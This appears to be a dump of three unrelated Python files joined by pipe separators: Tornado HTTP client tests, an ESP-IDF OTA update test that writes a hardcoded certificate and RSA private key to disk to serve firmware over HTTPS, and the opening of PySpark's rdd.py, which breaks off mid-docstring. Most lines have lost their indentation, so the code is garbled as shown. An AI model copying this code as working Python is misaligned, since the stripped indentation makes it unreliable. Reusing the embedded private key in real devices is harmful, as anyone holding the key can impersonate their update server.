def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.lower().startswith('content-type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent', allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
try:
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u("MyUserAgent"), b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers['User-Agent'] = value
resp = self.fetch('/user_agent', headers=headers)
self.assertEqual(
resp.body, b"MyUserAgent",
"response=%r, value=%r, container=%r" %
(resp.body, value, container))
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
                stream.write(b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block

""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.headers['X-XSS-Protection'], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is not stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(self.get_url('/notfound'), raise_error=False)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
def test_all_methods(self):
for method in ['GET', 'DELETE', 'OPTIONS']:
response = self.fetch('/all_methods', method=method)
self.assertEqual(response.body, utf8(method))
for method in ['POST', 'PUT', 'PATCH']:
response = self.fetch('/all_methods', method=method, body=b'')
self.assertEqual(response.body, utf8(method))
response = self.fetch('/all_methods', method='HEAD')
self.assertEqual(response.body, b'')
response = self.fetch('/all_methods', method='OTHER',
allow_nonstandard_methods=True)
self.assertEqual(response.body, b'OTHER')
def test_body_sanity_checks(self):
# These methods require a body.
for method in ('POST', 'PUT', 'PATCH'):
with self.assertRaises(ValueError) as context:
resp = self.fetch('/all_methods', method=method)
resp.rethrow()
self.assertIn('must not be None', str(context.exception))
resp = self.fetch('/all_methods', method=method,
allow_nonstandard_methods=True)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ('GET', 'DELETE', 'OPTIONS'):
with self.assertRaises(ValueError) as context:
resp = self.fetch('/all_methods', method=method, body=b'asdf')
resp.rethrow()
self.assertIn('must be None', str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != 'GET':
resp = self.fetch('/all_methods', method=method, body=b'asdf',
allow_nonstandard_methods=True)
resp.rethrow()
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch("/redirect?status=307&url=/put",
method="PUT", body=b"hello")
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
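# A standalone usage sketch (not one of the test cases) of the
# header_callback / streaming_callback combination exercised by
# test_header_callback and test_chunked above: header callbacks always run
# before any body chunks arrive, so headers can be inspected while the body
# streams in. The URL is a placeholder.
def _example_streaming_fetch(url="http://127.0.0.1:8888/chunk"):
    headers = {}
    chunks = []
    def on_header(line):
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    def on_chunk(chunk):
        # By the time the first chunk arrives, `headers` is fully populated.
        chunks.append(chunk)
    client = HTTPClient()
    try:
        response = client.fetch(url, header_callback=on_header,
                                streaming_callback=on_chunk)
        # With streaming_callback set, the body is delivered to the callback
        # rather than buffered in response.body.
        return response.code, headers, b"".join(chunks)
    finally:
        client.close()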
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ in ('TwistedIOLoop',
'AsyncIOMainLoop'):
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
# AsyncIOMainLoop doesn't work with the default policy
# (although it could with some tweaks to this test and a
# policy that created loops for non-main threads).
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop or '
'AsyncIOMainLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
self.server = HTTPServer(app, io_loop=self.server_ioloop)
self.server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by one iteration because
# the server may still have some cleanup work left when
            # the client finishes with the response (this is noticeable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
self.server_ioloop.add_callback(self.server_ioloop.stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://127.0.0.1:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest('http://example.com', headers={'foo': 'bar'})
self.assertEqual(request.headers, {'foo': 'bar'})
def test_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = {'bar': 'baz'}
self.assertEqual(request.headers, {'bar': 'baz'})
def test_null_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = None
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest('http://example.com', body='foo')
self.assertEqual(request.body, utf8('foo'))
def test_body_setter(self):
request = HTTPRequest('http://example.com')
request.body = 'foo'
self.assertEqual(request.body, utf8('foo'))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest('http://example.com', if_modified_since=http_date)
self.assertEqual(request.headers,
{'If-Modified-Since': format_timestamp(http_date)})
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_str(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
|
example_test.py
|
import multiprocessing
import os
import re
import socket
import ssl
from tiny_test_fw import DUT
import ttfw_idf
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
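    # "Connecting" a UDP socket to a public address sends no packets, but it
    # makes the OS pick the outgoing interface, whose address is this host's
    # LAN IP.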
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, server_port):
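    # connect_ex() returns 0 when a TCP connection to the port succeeds,
    # i.e. something is already listening there.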
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, server_port))
sock.close()
    return server_status == 0
def start_https_server(ota_image_dir, server_ip, server_port, server_file=None, key_file=None):
    os.chdir(ota_image_dir)
    if server_file is None:
        server_file = os.path.join(ota_image_dir, "server_cert.pem")
    with open(server_file, "w+") as cert_file_handle:
        cert_file_handle.write(server_cert)
    if key_file is None:
        key_file = os.path.join(ota_image_dir, "server_key.pem")
    with open(key_file, "w+") as key_file_handle:
        key_file_handle.write(server_key)
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
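    # Serve the OTA image over HTTPS from this host, unless something is
    # already listening on port 8000.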
    if not get_server_status(host_ip, 8000):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
    except DUT.ExpectTimeout:
        thread1.terminate()
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
thread1.terminate()
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for built-in types, especially
    for None and for tuples containing None.
    The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
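        # Tuple hashing mirrors CPython 2.7's algorithm (seed 0x345678,
        # multiplier 1000003) so results are stable across interpreters.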
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
    A bounded float value produced by an approximate job, carrying a confidence
    level together with low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
    if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
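        # Wrap the socket in a buffered file object and stream deserialized
        # items lazily; the socket is closed in the finally block once
        # iteration finishes.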
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of strings in doctests, to make them work
    in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
        If no storage level is specified, it defaults to C{MEMORY_ONLY_SER}.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
        recommended that this RDD is persisted in memory, otherwise saving it
        to a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
        Returns the number of partitions in this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
            without replacement: probability that each element is chosen; fraction must be in [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
